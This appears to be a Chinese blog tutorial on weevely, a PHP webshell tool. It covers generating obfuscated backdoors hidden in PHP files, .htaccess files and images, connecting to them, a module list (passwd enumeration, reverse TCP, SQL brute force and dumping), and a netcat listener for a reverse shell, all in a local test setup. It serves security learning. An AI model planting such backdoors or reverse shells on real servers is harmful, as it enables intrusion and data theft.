小编也是刚刚接触这款php菜刀不久  但是发觉他真的很强大   那么很强大怎么办?   当然是分享给各位白帽子啦!!!!!!

weevely是一款使用python编写的webshell工具,集webshell生成和连接于一身,采用c/s模式构建,可以算作是linux下的一款php菜刀替代工具,具有很好的隐蔽性(生成随机参数base64加密),在linux上使用时还是很给力的(集服务器错误配置审计,后门放置,暴力破解,文件管理,资源搜索,网络代理,命令执行,数据库操作,系统信息收集及端口扫描等功能),就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具(仅用于安全学习教学之用,禁止非法用途)

项目地址:http://epinna.github.com/Weevely/
作者:Emilio Pinna  

测试环境:kali linux 1.0.6 amd64 + Apache + php

1.生成后门

初识weevely(php菜刀) - 成雨 - 成雨s Blog-关注Web信息安全

 界面很清晰  有木有我就问你们!!!O(∩_∩)O~

查看weevely help可以看到weevely可以生成三种形式的php后门:


:generate.php  //生成php后门文件

:generate.htaccess  //将后门代码插入到.htaccess,需要开启.htaccess支持  (关于.htaccess文件

:generate.img  //将后门代码插入到图片中,并修改.htaccess,需开启.htaccess支持

 1.1 生成php后门文件

初识weevely(php菜刀) - 成雨 - 成雨s Blog-关注Web信息安全

 wevely会生成经过base64加密且参数随机的后门:

随机参数和加密的   可不可怕就问你们

1.2 生成.htaccess后门

初识weevely(php菜刀) - 成雨 - 成雨s Blog-关注Web信息安全

  1.3 生成.img图片后门

初识weevely(php菜刀) - 成雨 - 成雨s Blog-关注Web信息安全

 2. 连接后门

连接方式都是一样的: weevely <url> <password>  这里不一一例举,但采用.htaccess或图片连接时要开启.htaccess支持:

kali下找apache2的配置文件,查看/etc/apache2/apache2.conf文件,发现没有,但它包含多个配置文件,依次查看,结果在其包含的sites-enabled/下找到了,其绝对路径:/etc/apache2/sites-enabled/000-default 修改如下配置以支持htaccess:

初识weevely(php菜刀) - 成雨 - 成雨s Blog-关注Web信息安全

 连接图片后门示例:

初识weevely(php菜刀) - 成雨 - 成雨s Blog-关注Web信息安全

 当然,weevely也支持在连接时直接带上命令直接执行:

~$ weevely http://127.0.0.1/img_door/1.jpg linger "ls"  //这与上面的两步一样的,上面的类似交

3.weevely丰富的模块功能

查看weevely的可利用模块:(可按TAB键进入控制台模式)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
~#  weevely help
+----------------------+--------------------------------------------------+
 module                | description                         
 
+----------------------+--------------------------------------------------+
| :audit.etcpasswd     | 枚举/etc/passwd                                 |
| :audit.userfiles     | 列举用户/home下具有权限的文件                      |
| :audit.mapwebfiles   | 枚举任意Web站点的URL链接                          |
| :shell.php           | 编写php文件                                      |
| :shell.sh            | 编写系统脚本                                      |
| :system.info         | 收集系统信息                                      |
| :find.suidsgid       | 查找SUID / SGID文件和目录                         |
| :find.perms          | 查找权限可读/写/可执行文件和目录                     |
| :backdoor.tcp        | TCP端口后门                                       |
| :backdoor.reversetcp | 反弹TCP连接                                       |
| :bruteforce.sql      | 爆破指定数据库用户名密码                            |
| :bruteforce.sqlusers | 爆破所有数据库用户密码                              |
| :file.upload         | 上传本地文件                                       |
| :file.upload2web     | 上传二进制/ ASCII文件至目标站点文件夹并枚举URL        |
| :file.enum           | 在本地词表的书面枚举远程文件                         |
| :file.read           | 读文件                                            |
| :file.rm             | 删除文件                                          |
| :file.check          | 检查远程文件的状态(md5值,大小,权限等)              |
| :file.download       | 下载远程二进制/ ASCII文件到本地                      |
| :sql.console         | 启动SQL控制台                                      |
| :sql.dump            | 备份数据库,即脱库                                  |
| :net.scan            | 端口扫描                                           |
| :net.phpproxy        | 安装远程php代理                                   |
| :net.ifaces          | 显示远程主机网络接口信息                             |
| :net.proxy           | 安装隧道通信代理                                    |
 
+----------------------+----------------------------------------------------+

 

 反弹TCP连接到本地:

本地监听8008端口等待连接:

1
~$ nc -l -p 8008

 在weevely上建立TCP连接:



可以看到本地与远程主机已经建立了连接:

初识weevely(php菜刀) - 成雨 - 成雨s Blog-关注Web信息安全

 

枚举任意Web站点的URL链接

1
:audit.mapwebfiles http://xxx.xxx.xx.xx/index.php http://xxx.xxx.xx.xx /var/www/conf

 上传本地文件到远程主机指定路径

初识weevely(php菜刀) - 成雨 - 成雨s Blog-关注Web信息安全

 







从远程主机下载文件

初识weevely(php菜刀) - 成雨 - 成雨s Blog-关注Web信息安全

 


当然还有很多强大的功能,在新版的kali里貌似新加了一些模块,用法都差不多,可以查看帮助“ :help shell.sh”。